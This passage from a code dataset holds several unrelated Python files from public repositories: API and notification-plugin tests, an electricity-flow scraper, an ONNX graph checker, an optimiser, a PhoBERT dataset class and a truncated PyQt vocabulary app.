self.assertEqual(response.status_code, status.HTTP_422_UNPROCESSABLE_ENTITY)\n self.assertEqual(\n response.json(),\n {\"arguments\": [chain_id], \"code\": 2, \"message\": \"Chain is not supported\"},\n )\n\n chain_id = self.ganache_chain_id\n response = self.client.get(\n reverse(\n \"v1:tokens:price-usd\",\n args=(\n chain_id,\n token_address,\n ),\n )\n )\n\n # Native token should be retrieved even if it is not part of the Token table\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(response.data[\"fiat_code\"], \"USD\")\n self.assertEqual(response.data[\"fiat_price\"], \"321.2\")\n self.assertTrue(response.data[\"timestamp\"])\n\n @mock.patch.object(\n PriceService,\n \"get_token_usd_price\",\n side_effect=CannotGetPrice(),\n )\n def test_token_price_view_error(self, get_token_usd_price_mock: MagicMock):\n chain_id = 1\n token_address = \"0x0000000000000000000000000000000000000000\"\n\n response = self.client.get(\n reverse(\n \"v1:tokens:price-usd\",\n args=(\n chain_id,\n token_address,\n ),\n )\n )\n self.assertEqual(response.status_code, status.HTTP_422_UNPROCESSABLE_ENTITY)\n self.assertEqual(\n response.json(),\n {\"arguments\": [chain_id], \"code\": 2, \"message\": \"Chain is not supported\"},\n )\n\n chain_id = self.ganache_chain_id\n response = self.client.get(\n reverse(\n \"v1:tokens:price-usd\",\n args=(\n chain_id,\n token_address,\n ),\n )\n )\n self.assertEqual(response.status_code, status.HTTP_503_SERVICE_UNAVAILABLE)\n self.assertEqual(response.data[\"message\"], \"Price retrieval failed\")\n self.assertEqual(response.data[\"arguments\"], [token_address])\n","repo_name":"safe-global/safe-price-service","sub_path":"safe_price_service/tokens/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":5685,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"29957085777","text":"\nfrom onnx import onnx_pb\nimport onnx\n\ndef is_topsort(model):\n queue = [model]\n namespace = set()\n while queue:\n next_level = []\n for q in queue:\n # if q is model, push q.graph (GraphProto)\n if isinstance(q, onnx_pb.ModelProto):\n next_level.append(q.graph)\n # if q is model.graph, push q.node.attribute (AttributeProto)\n if isinstance(q, onnx_pb.GraphProto):\n for n in q.initializer:\n namespace.add(n.name)\n for n in q.input:\n namespace.add(n.name)\n for n in q.node:\n for inp in n.input:\n assert inp in namespace\n for out in n.output:\n namespace.add(out)\n for attr in n.attribute:\n next_level.append(attr)\n \n # if q is model.graph.node.attribute, push q.g and q.graphs (GraphProto)\n if isinstance(q, onnx_pb.AttributeProto):\n next_level.append(q.g)\n for n in q.graphs:\n next_level.append(n)\n queue = next_level\n return True\n\ndef repair_model(model):\n return []\n\n#print(is_topsort(onnx.load(r\"C:\\Users\\tomwi\\Documents\\tfhubmodels\\bit-m-r50x1\\model.onnx\")))\n\nprint(is_topsort(onnx.load(r\"C:\\Users\\tomwi\\OneDrive - Microsoft\\ONNX\\onnxconverter-common\\fp16problem\\melgen_fs_opset11_new.onnx\")))","repo_name":"pranavsambyal/Machine-Learning","sub_path":"ml-env/Lib/site-packages/onnxconverter_common/repair.py","file_name":"repair.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9870148397","text":"#!/usr/bin/env python3\n\n# The arrow library is used to handle datetimes consistently with other parsers\nfrom datetime import datetime, timezone\nfrom 
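# A self-contained sketch of the mocking pattern exercised in the tests
# above: patch the two collaborators and assert the composed USD price.
# PriceService here is a stand-in class, not the real project import.
from unittest import mock

class PriceService:
    def get_token_eth_value_from_oracles(self, address):
        raise NotImplementedError
    def get_native_coin_usd_price(self):
        raise NotImplementedError
    def get_token_usd_price(self, address):
        return (self.get_token_eth_value_from_oracles(address)
                * self.get_native_coin_usd_price())

with mock.patch.object(PriceService, 'get_token_eth_value_from_oracles',
                       return_value=4815), \
     mock.patch.object(PriceService, 'get_native_coin_usd_price',
                       return_value=3):
    assert PriceService().get_token_usd_price('0xabc') == 14445  # 4815 * 3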
logging import Logger, getLogger\nfrom typing import Any\n\n# BeautifulSoup is used to parse HTML to get information\nfrom bs4 import BeautifulSoup\nfrom requests import Session\n\nfrom electricitymap.contrib.lib.models.event_lists import (\n ExchangeList,\n ProductionBreakdownList,\n)\nfrom electricitymap.contrib.lib.models.events import ProductionMix\nfrom electricitymap.contrib.lib.types import ZoneKey\n\nSOURCE = \"tso.nbpower.com\"\nEXCHANGE_TO_FLOWS = {\n ZoneKey(\"CA-NB->CA-QC\"): [\"QUEBEC\"],\n # all of these exports are to Maine\n # (see https://www.nbpower.com/en/about-us/our-energy/system-map/),\n # currently this is mapped to ISO-NE\n ZoneKey(\"CA-NB->US-NE-ISNE\"): [\"EMEC\", \"ISO-NE\", \"MPS\"],\n ZoneKey(\"CA-NB->CA-NS\"): [\"NOVA SCOTIA\"],\n ZoneKey(\"CA-NB->CA-PE\"): [\"PEI\"],\n}\n\n\ndef _get_new_brunswick_flows(requests_obj):\n \"\"\"\n Gets current electricity flows in and out of New Brunswick.\n\n There is no reported data timestamp in the page.\n The page returns current time and says \"Times at which values are sampled may vary by as much as 5 minutes.\"\n \"\"\"\n\n url = \"https://tso.nbpower.com/Public/en/SystemInformation_realtime.asp\"\n response = requests_obj.get(url)\n\n soup = BeautifulSoup(response.text, \"html.parser\")\n\n table = soup.find(\"table\", attrs={\"bordercolor\": \"#191970\"})\n\n rows = table.find_all(\"tr\")\n\n headers = rows[1].find_all(\"td\")\n values = rows[2].find_all(\"td\")\n\n flows = {\n headers[i].text.strip(): float(row.text.strip()) for i, row in enumerate(values)\n }\n\n return flows\n\n\ndef fetch_production(\n zone_key: ZoneKey = ZoneKey(\"CA-NB\"),\n session: Session | None = None,\n target_datetime: datetime | None = None,\n logger: Logger = getLogger(__name__),\n) -> list[dict[str, Any]]:\n \"\"\"Requests the last known production mix (in MW) of a given country.\"\"\"\n\n \"\"\"\n In this case, we are calculating the amount of electricity generated\n in New Brunswick, versus imported and exported elsewhere.\n \"\"\"\n\n if target_datetime:\n raise NotImplementedError(\"This parser is not yet able to parse past dates\")\n\n requests_obj = session or Session()\n flows = _get_new_brunswick_flows(requests_obj)\n\n # nb_flows['NB Demand'] is the use of electricity in NB\n # 'EMEC', 'ISO-NE', 'MPS', 'NOVA SCOTIA', 'PEI', and 'QUEBEC'\n # are exchanges - positive for exports, negative for imports\n # Electricity generated in NB is then 'NB Demand' plus all the others\n\n generated = (\n flows[\"NB Demand\"]\n + flows[\"EMEC\"]\n + flows[\"ISO-NE\"]\n + flows[\"MPS\"]\n + flows[\"NOVA SCOTIA\"]\n + flows[\"PEI\"]\n + flows[\"QUEBEC\"]\n )\n production = ProductionBreakdownList(logger)\n production.append(\n zoneKey=zone_key,\n # Using the current utc time because the page returns the current time.\n datetime=datetime.now(tz=timezone.utc).replace(\n minute=0, second=0, microsecond=0\n ),\n source=SOURCE,\n production=ProductionMix(\n unknown=generated,\n ),\n )\n\n return production.to_list()\n\n\ndef fetch_exchange(\n zone_key1: ZoneKey,\n zone_key2: ZoneKey,\n session: Session | None = None,\n target_datetime: datetime | None = None,\n logger: Logger = getLogger(__name__),\n) -> list[dict[str, Any]]:\n \"\"\"Requests the last known power exchange (in MW) between two regions.\"\"\"\n if target_datetime:\n raise NotImplementedError(\"This parser is not yet able to parse past dates\")\n\n sorted_zone_keys = \"->\".join(sorted([zone_key1, zone_key2]))\n\n requests_obj = session or Session()\n flows = 
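# _get_new_brunswick_flows above zips one header row against one value row;
# the shape of that parse can be checked offline with a canned table (the
# HTML here is illustrative, not the live NB Power page):
from bs4 import BeautifulSoup

html = ('<table><tr><td>title</td></tr>'
        '<tr><td>NB Demand</td><td>QUEBEC</td></tr>'
        '<tr><td>1500.0</td><td>-120.5</td></tr></table>')
rows = BeautifulSoup(html, 'html.parser').find_all('tr')
headers, values = rows[1].find_all('td'), rows[2].find_all('td')
flows = {headers[i].text.strip(): float(v.text.strip())
         for i, v in enumerate(values)}
assert flows == {'NB Demand': 1500.0, 'QUEBEC': -120.5}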
_get_new_brunswick_flows(requests_obj)\n\n # In this source, positive values are exports and negative are imports.\n # In expected result, \"net\" represents an export.\n # So these can be used directly.\n\n if sorted_zone_keys not in EXCHANGE_TO_FLOWS:\n raise NotImplementedError(\"This exchange pair is not implemented\")\n exchanges = ExchangeList(logger)\n exchanges.append(\n zoneKey=sorted_zone_keys,\n datetime=datetime.now(tz=timezone.utc).replace(\n minute=0, second=0, microsecond=0\n ),\n source=SOURCE,\n netFlow=sum([flows[flow] for flow in EXCHANGE_TO_FLOWS[sorted_zone_keys]]),\n )\n\n return exchanges.to_list()\n\n\nif __name__ == \"__main__\":\n \"\"\"Main method, never used by the Electricity Map backend, but handy for testing.\"\"\"\n\n print(\"fetch_production() ->\")\n print(fetch_production())\n\n print('fetch_exchange(\"CA-NB\", \"CA-PE\") ->')\n print(fetch_exchange(ZoneKey(\"CA-NB\"), ZoneKey(\"CA-PE\")))\n","repo_name":"electricitymaps/electricitymaps-contrib","sub_path":"parsers/CA_NB.py","file_name":"CA_NB.py","file_ext":"py","file_size_in_byte":4761,"program_lang":"python","lang":"en","doc_type":"code","stars":3126,"dataset":"github-code","pt":"21"} +{"seq_id":"74363590772","text":"import requests\nimport json\n\nurl = 'https://54qhf521ze.execute-api.eu-north-1.amazonaws.com/weather/stockholm'\n\ntry:\n response = requests.get(url)\n response.raise_for_status() # Raise an exception if the request was not successful\n response_dictionary = json.loads(response.text)\n print(response_dictionary)\nexcept requests.exceptions.RequestException as e:\n print(\"An error occurred:\", e)\nexcept json.JSONDecodeError as e:\n print(\"JSON decoding error:\", e)\n","repo_name":"unikhex/devops-23","sub_path":"lektion 7/api_demo.py","file_name":"api_demo.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15224819447","text":"import os\nfrom json import loads\nfrom unittest import mock\nfrom inspect import cleandoc\n\nimport pytest\nimport requests\nfrom apprise import Apprise\nfrom apprise.plugins.NotifySignalAPI import NotifySignalAPI\nfrom helpers import AppriseURLTester\nfrom apprise import AppriseAttachment\nfrom apprise import NotifyType\nfrom apprise.config.ConfigBase import ConfigBase\n\n# Disable logging for a cleaner testing output\nimport logging\nlogging.disable(logging.CRITICAL)\n\n# Attachment Directory\nTEST_VAR_DIR = os.path.join(os.path.dirname(__file__), 'var')\n\n\n@pytest.fixture\ndef request_mock(mocker):\n \"\"\"\n Prepare requests mock.\n \"\"\"\n mock_post = mocker.patch(\"requests.post\")\n mock_post.return_value = requests.Request()\n mock_post.return_value.status_code = requests.codes.ok\n mock_post.return_value.content = \"\"\n return mock_post\n\n\n# Our Testing URLs\napprise_url_tests = (\n ('signal://', {\n # No host specified\n 'instance': TypeError,\n }),\n ('signal://:@/', {\n # invalid host\n 'instance': TypeError,\n }),\n ('signal://localhost', {\n # Just a host provided\n 'instance': TypeError,\n }),\n ('signal://localhost', {\n # key and secret provided and from but invalid from no\n 'instance': TypeError,\n }),\n ('signal://localhost/123', {\n # invalid from phone\n 'instance': TypeError,\n\n }),\n ('signal://localhost/{}/123/'.format('1' * 11), {\n # invalid 'to' phone number\n 'instance': NotifySignalAPI,\n # Notify will fail because it couldn't send to anyone\n 'response': False,\n # Our expected url(privacy=True) startswith() response:\n 
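# With the sign convention above (positive = export from New Brunswick), the
# CA-NB->US-NE-ISNE net flow is the sum of its three interfaces. Numbers
# here are made up for illustration:
flows = {'EMEC': 15.0, 'ISO-NE': 230.0, 'MPS': -12.5}
interfaces = ['EMEC', 'ISO-NE', 'MPS']
net_flow = sum(flows[name] for name in interfaces)
assert net_flow == 232.5  # net export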
'privacy_url': 'signal://localhost/+{}/123'.format('1' * 11),\n }),\n ('signal://localhost:8080/{}/'.format('1' * 11), {\n # one phone number will notify ourselves\n 'instance': NotifySignalAPI,\n }),\n\n ('signal://localhost:8082/+{}/@group.abcd/'.format('2' * 11), {\n # a valid group\n 'instance': NotifySignalAPI,\n # Our expected url(privacy=True) startswith() response:\n 'privacy_url': 'signal://localhost:8082/+{}/@abcd'.format('2' * 11),\n }),\n ('signal://localhost:8080/+{}/group.abcd/'.format('1' * 11), {\n # another valid group (without @ symbol)\n 'instance': NotifySignalAPI,\n # Our expected url(privacy=True) startswith() response:\n 'privacy_url': 'signal://localhost:8080/+{}/@abcd'.format('1' * 11),\n }),\n ('signal://localhost:8080/?from={}&to={},{}'.format(\n '1' * 11, '2' * 11, '3' * 11), {\n # use get args to acomplish the same thing\n 'instance': NotifySignalAPI,\n }),\n ('signal://localhost:8080/?from={}&to={},{},{}'.format(\n '1' * 11, '2' * 11, '3' * 11, '5' * 3), {\n # 2 good targets and one invalid one\n 'instance': NotifySignalAPI,\n }),\n ('signal://localhost:8080/{}/{}/?from={}'.format(\n '1' * 11, '2' * 11, '3' * 11), {\n # If we have from= specified, then all elements take on the to= value\n 'instance': NotifySignalAPI,\n }),\n ('signals://user@localhost/{}/{}'.format('1' * 11, '3' * 11), {\n # use get args to acomplish the same thing (use source instead of from)\n 'instance': NotifySignalAPI,\n }),\n ('signals://user:password@localhost/{}/{}'.format('1' * 11, '3' * 11), {\n # use get args to acomplish the same thing (use source instead of from)\n 'instance': NotifySignalAPI,\n }),\n ('signals://user:password@localhost/{}/{}'.format('1' * 11, '3' * 11), {\n 'instance': NotifySignalAPI,\n # Test that a 201 response code is still accepted\n 'requests_response_code': 201,\n }),\n ('signals://localhost/{}/{}/{}?batch=True'.format(\n '1' * 11, '3' * 11, '4' * 11), {\n # test batch mode\n 'instance': NotifySignalAPI,\n }),\n ('signals://localhost/{}/{}/{}?status=True'.format(\n '1' * 11, '3' * 11, '4' * 11), {\n # test status switch\n 'instance': NotifySignalAPI,\n }),\n ('signal://localhost/{}/{}'.format('1' * 11, '4' * 11), {\n 'instance': NotifySignalAPI,\n # throw a bizzare code forcing us to fail to look it up\n 'response': False,\n 'requests_response_code': 999,\n }),\n ('signal://localhost/{}/{}'.format('1' * 11, '4' * 11), {\n 'instance': NotifySignalAPI,\n # Throws a series of connection and transfer exceptions when this flag\n # is set and tests that we gracfully handle them\n 'test_requests_exceptions': True,\n }),\n)\n\n\ndef test_plugin_signal_urls():\n \"\"\"\n NotifySignalAPI() Apprise URLs\n\n \"\"\"\n\n # Run our general tests\n AppriseURLTester(tests=apprise_url_tests).run_all()\n\n\ndef test_plugin_signal_edge_cases(request_mock):\n \"\"\"\n NotifySignalAPI() Edge Cases\n\n \"\"\"\n # Initialize some generic (but valid) tokens\n source = '+1 (555) 123-3456'\n target = '+1 (555) 987-5432'\n body = \"test body\"\n title = \"My Title\"\n\n # No apikey specified\n with pytest.raises(TypeError):\n NotifySignalAPI(source=None)\n\n aobj = Apprise()\n assert aobj.add(\"signals://localhost:231/{}/{}\".format(source, target))\n assert aobj.notify(title=title, body=body)\n\n assert request_mock.call_count == 1\n\n details = request_mock.call_args_list[0]\n assert details[0][0] == 'https://localhost:231/v2/send'\n payload = loads(details[1]['data'])\n assert payload['message'] == 'My Title\\r\\ntest body'\n\n # Reset our mock object\n 
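# Each tuple above pairs a URL with an expected outcome; the heart of such a
# table-driven check is Apprise.instantiate, which returns a plugin instance
# for a well-formed URL (sketch assumes the apprise package is installed):
from apprise import Apprise
from apprise.plugins.NotifySignalAPI import NotifySignalAPI

obj = Apprise.instantiate('signal://localhost:8080/{}/'.format('1' * 11))
assert isinstance(obj, NotifySignalAPI)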
request_mock.reset_mock()\n\n aobj = Apprise()\n assert aobj.add(\n \"signals://user@localhost:231/{}/{}?status=True\".format(\n source, target))\n assert aobj.notify(title=title, body=body)\n\n assert request_mock.call_count == 1\n\n details = request_mock.call_args_list[0]\n assert details[0][0] == 'https://localhost:231/v2/send'\n payload = loads(details[1]['data'])\n # Status flag is set\n assert payload['message'] == '[i] My Title\\r\\ntest body'\n\n\ndef test_plugin_signal_yaml_config(request_mock):\n \"\"\"\n NotifySignalAPI() YAML Configuration\n \"\"\"\n\n # Load our configuration\n result, config = ConfigBase.config_parse_yaml(cleandoc(\"\"\"\n urls:\n - signal://signal:8080/+1234567890:\n - to: +0987654321\n tag: signal\n \"\"\"))\n\n # Verify we loaded correctly\n assert isinstance(result, list)\n assert len(result) == 1\n assert len(result[0].tags) == 1\n assert 'signal' in result[0].tags\n\n # Let's get our plugin\n plugin = result[0]\n assert len(plugin.targets) == 1\n assert '+1234567890' == plugin.source\n assert '+0987654321' in plugin.targets\n\n #\n # Test another way to get the same results\n #\n\n # Load our configuration\n result, config = ConfigBase.config_parse_yaml(cleandoc(\"\"\"\n urls:\n - signal://signal:8080/+1234567890/+0987654321:\n - tag: signal\n \"\"\"))\n\n # Verify we loaded correctly\n assert isinstance(result, list)\n assert len(result) == 1\n assert len(result[0].tags) == 1\n assert 'signal' in result[0].tags\n\n # Let's get our plugin\n plugin = result[0]\n assert len(plugin.targets) == 1\n assert '+1234567890' == plugin.source\n assert '+0987654321' in plugin.targets\n\n\ndef test_plugin_signal_based_on_feedback(request_mock):\n \"\"\"\n NotifySignalAPI() User Feedback Test\n\n \"\"\"\n body = \"test body\"\n title = \"My Title\"\n\n aobj = Apprise()\n aobj.add(\n 'signal://10.0.0.112:8080/+12512222222/+12513333333/'\n '12514444444?batch=yes')\n\n assert aobj.notify(title=title, body=body)\n\n # If a batch, there is only 1 post\n assert request_mock.call_count == 1\n\n details = request_mock.call_args_list[0]\n assert details[0][0] == 'http://10.0.0.112:8080/v2/send'\n payload = loads(details[1]['data'])\n assert payload['message'] == 'My Title\\r\\ntest body'\n assert payload['number'] == \"+12512222222\"\n assert len(payload['recipients']) == 2\n assert \"+12513333333\" in payload['recipients']\n # The + is appended\n assert \"+12514444444\" in payload['recipients']\n\n # Reset our test and turn batch mode off\n request_mock.reset_mock()\n\n aobj = Apprise()\n aobj.add(\n 'signal://10.0.0.112:8080/+12512222222/+12513333333/'\n '12514444444?batch=no')\n\n assert aobj.notify(title=title, body=body)\n\n # If a batch, there is only 1 post\n assert request_mock.call_count == 2\n\n details = request_mock.call_args_list[0]\n assert details[0][0] == 'http://10.0.0.112:8080/v2/send'\n payload = loads(details[1]['data'])\n assert payload['message'] == 'My Title\\r\\ntest body'\n assert payload['number'] == \"+12512222222\"\n assert len(payload['recipients']) == 1\n assert \"+12513333333\" in payload['recipients']\n\n details = request_mock.call_args_list[1]\n assert details[0][0] == 'http://10.0.0.112:8080/v2/send'\n payload = loads(details[1]['data'])\n assert payload['message'] == 'My Title\\r\\ntest body'\n assert payload['number'] == \"+12512222222\"\n assert len(payload['recipients']) == 1\n\n # The + is appended\n assert \"+12514444444\" in payload['recipients']\n\n request_mock.reset_mock()\n\n # Test group names\n aobj = Apprise()\n aobj.add(\n 
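# The payload assertions above decode the JSON handed to requests.post; the
# pattern in isolation (mock the call, then unpack call_args_list):
from json import loads
from unittest import mock
import requests

with mock.patch('requests.post') as mock_post:
    requests.post('https://example.invalid/v2/send', data='{"message": "hi"}')
    details = mock_post.call_args_list[0]
    assert details[0][0] == 'https://example.invalid/v2/send'  # positional args
    assert loads(details[1]['data'])['message'] == 'hi'        # keyword args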
'signal://10.0.0.112:8080/+12513333333/@group1/@group2/'\n '12514444444?batch=yes')\n\n assert aobj.notify(title=title, body=body)\n\n # If a batch, there is only 1 post\n assert request_mock.call_count == 1\n\n details = request_mock.call_args_list[0]\n assert details[0][0] == 'http://10.0.0.112:8080/v2/send'\n payload = loads(details[1]['data'])\n assert payload['message'] == 'My Title\\r\\ntest body'\n assert payload['number'] == \"+12513333333\"\n assert len(payload['recipients']) == 3\n assert \"+12514444444\" in payload['recipients']\n # our groups\n assert \"group.group1\" in payload['recipients']\n assert \"group.group2\" in payload['recipients']\n # Groups are stored properly\n assert '/@group1' in aobj[0].url()\n assert '/@group2' in aobj[0].url()\n # Our target phone number is also in the path\n assert '/+12514444444' in aobj[0].url()\n\n\ndef test_notify_signal_plugin_attachments(request_mock):\n \"\"\"\n NotifySignalAPI() Attachments\n\n \"\"\"\n\n obj = Apprise.instantiate(\n 'signal://10.0.0.112:8080/+12512222222/+12513333333/'\n '12514444444?batch=no')\n assert isinstance(obj, NotifySignalAPI)\n\n # Test Valid Attachment\n path = os.path.join(TEST_VAR_DIR, 'apprise-test.gif')\n attach = AppriseAttachment(path)\n assert obj.notify(\n body='body', title='title', notify_type=NotifyType.INFO,\n attach=attach) is True\n\n # Test invalid attachment\n path = os.path.join(TEST_VAR_DIR, '/invalid/path/to/an/invalid/file.jpg')\n assert obj.notify(\n body='body', title='title', notify_type=NotifyType.INFO,\n attach=path) is False\n\n # Test Valid Attachment (load 3)\n path = (\n os.path.join(TEST_VAR_DIR, 'apprise-test.gif'),\n os.path.join(TEST_VAR_DIR, 'apprise-test.gif'),\n os.path.join(TEST_VAR_DIR, 'apprise-test.gif'),\n )\n attach = AppriseAttachment(path)\n\n # Return our good configuration\n with mock.patch('builtins.open', side_effect=OSError()):\n # We can't send the message we can't open the attachment for reading\n assert obj.notify(\n body='body', title='title', notify_type=NotifyType.INFO,\n attach=attach) is False\n\n # test the handling of our batch modes\n obj = Apprise.instantiate(\n 'signal://10.0.0.112:8080/+12512222222/+12513333333/'\n '12514444444?batch=yes')\n assert isinstance(obj, NotifySignalAPI)\n\n # Now send an attachment normally without issues\n request_mock.reset_mock()\n assert obj.notify(\n body='body', title='title', notify_type=NotifyType.INFO,\n attach=attach) is True\n assert request_mock.call_count == 1\n","repo_name":"caronc/apprise","sub_path":"test/test_plugin_signal.py","file_name":"test_plugin_signal.py","file_ext":"py","file_size_in_byte":11924,"program_lang":"python","lang":"en","doc_type":"code","stars":8936,"dataset":"github-code","pt":"21"} +{"seq_id":"34025253477","text":"import numpy as np\nfrom numpy import linalg as LA\n\nfrom trlib.algorithms.optimization.gradient import gradient\n\n\ndef quasi_newton(Qfunction, state, a0, epsilon, maxiterations):\n\n ak = np.array(a0)\n counter = 0\n error = 1e300\n\n grad = gradient(Qfunction, state, a0)\n H = np.array(np.eye(len(a0)))\n\n while np.any(np.linalg.eigvals(H) > 0): # we look for a local maximum\n\n while error > epsilon and counter < maxiterations:\n counter += 1\n d = H.dot(grad)\n alpha = 1\n ak_prec = ak\n grad_prec = grad\n\n ak = ak + alpha * d\n grad = gradient(Qfunction, state, ak)\n\n error = LA.norm(grad)\n\n delta = ak - ak_prec\n gamma = grad - grad_prec\n delta_t = np.array(delta)[np.newaxis]\n gamma_t = np.array(gamma)[np.newaxis]\n\n H = H + ((1 + gamma * H * gamma_t) 
/ (delta * gamma_t)) * (delta_t * delta) / (delta * gamma_t) - (\n (H * gamma_t * delta) + (delta_t * gamma * H)) / (delta * gamma_t)\n\n test = np.linalg.eigvals(H)\n\n return ak\n","repo_name":"albertometelli/pfqi","sub_path":"trlib/algorithms/optimization/quasi_newton.py","file_name":"quasi_newton.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"36522574332","text":"import torch\n\nclass PhoBertDataset(torch.utils.data.Dataset):\n def __init__(self, first_questions, second_questions, targets, tokenizer, config):\n self.first_questions = first_questions\n self.second_questions = second_questions\n self.targets = targets\n self.tokenizer = tokenizer\n self.length = len(first_questions)\n self.config = config\n\n def __len__(self):\n return self.length\n\n def __getitem__(self, index):\n first_questions = str(self.first_questions[index])\n second_questions = str(self.second_questions[index])\n\n # Remove extra white spaces from questions\n first_questions = \" \".join(first_questions.split())\n second_questions = \" \".join(second_questions.split())\n\n inputs = self.tokenizer.encode_plus(\n first_questions,\n second_questions,\n add_special_tokens=True,\n padding='max_length',\n max_length=2 * self.config['MAX_LEN'] + 3, # max length o 2 questions and 3 spectial tokens\n truncation=True\n )\n\n # Return targets 0, when using dataset in testing and targets are none\n return {\n \"ids\": torch.tensor(inputs[\"input_ids\"], dtype=torch.long),\n \"mask\": torch.tensor(inputs[\"attention_mask\"], dtype=torch.long),\n \"token_type_ids\": torch.tensor(inputs[\"token_type_ids\"], dtype=torch.long),\n \"targets\": torch.tensor(int(self.targets[index]), dtype=torch.long) if self.targets is not None else 0\n }\n","repo_name":"nducthang/Question-Similarity-in-Medical","sub_path":"src/PhoBert/PhoBertDataset.py","file_name":"PhoBertDataset.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"11318921018","text":"\"\"\"\n\nVocabulary.py\nThis file contains the functions for the Vocabulary page.\n- Show the vocabulary words in the list widget\n- Show a new window to show the Thai definition of the English word\n- Add the English word to the database\n- Delete the English word from the database\n- Add the English word to the favourite list\n\n\"\"\"\n\nfrom PyQt5.QtWidgets import QWidget, QLineEdit, QListWidget, QListWidgetItem, QPushButton, QDialog, QLabel, QDialogButtonBox, QMessageBox\nfrom ui.pages.Vocabulary_page_ui import Ui_Form\nfrom ui.pages.Modify_dialog_ui import Ui_Dialog\nfrom PyQt5.QtGui import QFont\nfrom PyQt5.QtSql import QSqlDatabase, QSqlQuery\nfrom PyQt5.QtWidgets import QHBoxLayout, QAbstractItemView, QMenu, QAction\nimport sqlite3\nfrom PyQt5.QtCore import Qt, QSize\nimport os\nimport sys\n\nclass Modify_dialog(QDialog):\n def __init__(self, parent=None):\n super(Modify_dialog, self).__init__(parent)\n self.ui = Ui_Dialog()\n self.ui.setupUi(self)\n\n #if click the checkbox will be enable too\n self.ui.listWidget.itemClicked.connect(self.enable_checkbox)\n\n def enable_checkbox(self, item):\n if item.checkState() == Qt.Checked:\n item.setCheckState(Qt.Unchecked)\n else:\n item.setCheckState(Qt.Checked)\n \n \n\nclass Vocabulary(QWidget):\n def __init__(self):\n super(Vocabulary, self).__init__()\n self.ui = Ui_Form()\n self.ui.setupUi(self)\n\n #Add search box\n 
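# The rank-2 update above is a DFP-style inverse-Hessian estimate written
# with row/column vectors; the textbook formula reads more directly with
# np.outer. A sketch of that formula, not a drop-in replacement for the
# expression above:
import numpy as np

def dfp_update(H, delta, gamma):
    Hg = H @ gamma
    return (H
            + np.outer(delta, delta) / float(delta @ gamma)
            - np.outer(Hg, Hg) / float(gamma @ Hg))

print(dfp_update(np.eye(2), np.array([0.1, 0.0]), np.array([0.2, 0.1])))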
self.ui.lineEdit.textChanged.connect(self.search)\n self.ui.listWidget.itemDoubleClicked.connect(self.show_dialog)\n\n\n def showEvent(self, event):\n self.ui.listWidget.clear()\n # Connect to the SQLite database\n # Connect to the SQLite database\n self.db = QSqlDatabase.addDatabase(\"QSQLITE\")\n db_name = \"data.db\"\n db_path = os.path.join(os.path.expanduser(\"~\"), db_name)\n print(db_path)\n \n if not os.path.exists(db_path):\n print(f\"Database file {db_path} does not exist\")\n return\n else:\n print(\"Connected to database\")\n \n self.db.setDatabaseName(db_path)\n\n # Open the database connection\n if not self.db.open():\n print(\"Failed to open database\")\n return\n else:\n print(\"Database opened successfully\")\n\n query = QSqlQuery()\n #Choose the vocab by filtering to show only one word vocab\n query.prepare(\"SELECT DISTINCT body from translation\")\n query.exec_()\n\n while query.next():\n english_word = query.value(0)\n self.ui.listWidget.addItem(english_word)\n \n print(\"Reconnected to database successfully\")\n \n def search(self, text):\n #find words from listWidget\n for i in range(self.ui.listWidget.count()):\n item = self.ui.listWidget.item(i)\n if item.text().lower().startswith(text.lower()):\n item.setHidden(False)\n else:\n item.setHidden(True)\n\n def show_dialog(self, item):\n dialog = Modify_dialog(self)\n dialog.ui.label.setText(item.text())\n dialog.setStyleSheet(\"QDialog {background-color: #FFF9F1;} QDialog:title {color: white; font-size: 16px; font-weight: bold;}\")\n query = QSqlQuery()\n query.prepare(\"SELECT entry.headword FROM translation JOIN entry ON translation.entry_id = entry._id WHERE translation.body = :word\")\n query.bindValue(\":word\", f\"{item.text()}\")\n query.exec_() \n headword = None\n while query.next():\n headword = query.value(0)\n dialog.ui.listWidget.addItem(headword)\n \n #add checkbox for multiple choosing in listWidget\n for i in range(dialog.ui.listWidget.count()):\n definition_item = dialog.ui.listWidget.item(i)\n definition_item.setFlags(definition_item.flags() | Qt.ItemIsUserCheckable)\n definition_item.setCheckState(Qt.Unchecked)\n # print(definition_item.text())\n Font = QFont()\n Font.setFamily(\"Poppins\")\n Font.setPointSize(14)\n dialog.ui.listWidget.setFont(Font)\n \n #button for add definition to database\n dialog.ui.pushButton_3.clicked.connect(lambda: self.add_word_to_database_window(item, dialog, headword))\n\n #button for delete the definition from database\n dialog.ui.pushButton.clicked.connect(lambda: self.delete_word_from_selection(dialog, item))\n\n dialog.finished.connect(lambda: self.reconnect_Eng_data(item))\n \n dialog.ui.pushButton_2.clicked.connect(lambda: self.add_word_to_favourites(dialog, item))\n\n dialog.exec_()\n\n def add_word_to_database_window(self, item, dialog, headword):\n #create a popup window\n popup = QDialog(self.ui.widget)\n popup.setWindowTitle(\"Add English Word\")\n popup.setStyleSheet(\"QDialog {background-color: #FBDA8A;} QDialog:title {color: white; font-size: 16px; font-weight: bold;}\")\n\n #create the input box for English word and Thai word\n english_word_edit = QLineEdit()\n thai_definition_edit = QLineEdit()\n\n #auto input English text after click button\n if isinstance(item.text(), str):\n english_word_edit.setText(item.text())\n else:\n english_word_edit.setText(\"\")\n\n #create explaination text\n english_word_label = QLabel(\"English Word:\")\n thai_definition_label = QLabel(\"Thai Definition:\")\n\n font= QFont()\n font.setFamily(\"Poppins\")\n 
